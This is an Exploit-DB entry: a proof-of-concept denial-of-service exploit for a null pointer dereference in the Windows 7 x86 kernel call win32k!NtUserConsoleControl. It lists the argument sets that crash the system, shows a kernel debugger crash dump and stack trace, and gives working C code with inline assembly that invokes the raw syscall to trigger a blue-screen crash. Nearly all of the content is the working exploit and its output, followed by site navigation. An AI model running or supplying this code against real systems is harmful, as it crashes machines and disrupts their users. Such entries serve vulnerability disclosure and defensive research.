Microsoft Windows Kernel - 'win32k!NtUserConsoleControl' Denial of Service (PoC)

EDB-ID:

45104

CVE:

N/A

EDB Verified:

Author:

vportal

Type:

dos

Exploit:   /  

Platform:

Windows

Date:

2018-07-30

Vulnerable App: 
/*
# Exploit Title: Microsoft Windows Kernel - 'win32k!NtUserConsoleControl' Denial of Service (PoC)
# Author: vportal
# Date: 2018-07-27
# Vendor homepage: http://www.microsoft.com
# Version: Windows 7 x86
# Tested on: Windows 7 x86
# CVE: N/A

# It is possible to trigger a BSOD caused by a Null pointer deference when calling the system 
# call NtUserConsoleControl with the following arguments:

# NtUserControlConsole(1,0,8).
# NtUserControlConsole(4,0,8).
# NtUserControlConsole(6,0,12).
# NtUserControlConsole(2,0,12).
# NtUserControlConsole(3,0,20).
# NtUserControlConsole(5,0,8).

# Different crashes are reproduced for each case. For the second case the crash is showed below:
# EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - La instrucci n en 0x%08lx hace referencia a la memoria 
# en 0x%08lx. La memoria no se pudo %s.
# FAULTING_IP:
# win32k!xxxSetConsoleCaretInfo+c
# 93310641 8b0e            mov     ecx,dword ptr [esi]

# TRAP_FRAME:  8c747b2c -- (.trap 0xffffffff8c747b2c)
# ErrCode = 00000000
# eax=00000000 ebx=00000000 ecx=84fc9100 edx=00000000 esi=00000000 edi=00000003
# eip=93310641 esp=8c747ba0 ebp=8c747bb0 iopl=0         nv up ei ng nz ac po nc
# cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00010292
# win32k!xxxSetConsoleCaretInfo+0xc:
# 93310641 8b0e            mov     ecx,dword ptr [esi]  ds:0023:00000000=????????
# Resetting default scope

# CUSTOMER_CRASH_COUNT:  1
# DEFAULT_BUCKET_ID:  VISTA_DRIVER_FAULT
# BUGCHECK_STR:  0x8E
# PROCESS_NAME:  Win32k-fuzzer_

# CURRENT_IRQL:  0
# LAST_CONTROL_TRANSFER:  from 9330fc27 to 93310641

# STACK_TEXT: 
# 8c747bb0 9330fc27 00000000 00000003 00000014 win32k!xxxSetConsoleCaretInfo+0xc
# 8c747bcc 9330fa8d 00000003 00000000 00000014 win32k!xxxConsoleControl+0x147
# 8c747c20 82848b8e 00000003 00000000 00000014 win32k!NtUserConsoleControl+0xc5
# 8c747c20 012e6766 00000003 00000000 00000014 nt!KiSystemServicePostCall
# WARNING: Frame IP not in any known module. Following frames may be wrong.
# 0016f204 00000000 00000000 00000000 00000000 0x12e6766

# PoC code:
*/

#include <Windows.h>

extern "C"

ULONG CDECL SystemCall32(DWORD ApiNumber, ...) 
{
__asm{mov eax, ApiNumber};
__asm{lea edx, ApiNumber + 4};
__asm{int 0x2e};
}


int _tmain(int argc, _TCHAR* argv[])
{

int st = 0;
int syscall_ID = 0x1160; //NtUserControlConsole ID Windows 7

LoadLibrary(L"user32.dll");

st = (int)SystemCall32(syscall_ID, 4, 0, 8);

return 0;
}

# The vulnerability has only been tested  in Windows 7 x86.
Tags: Denial of Service (DoS)
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services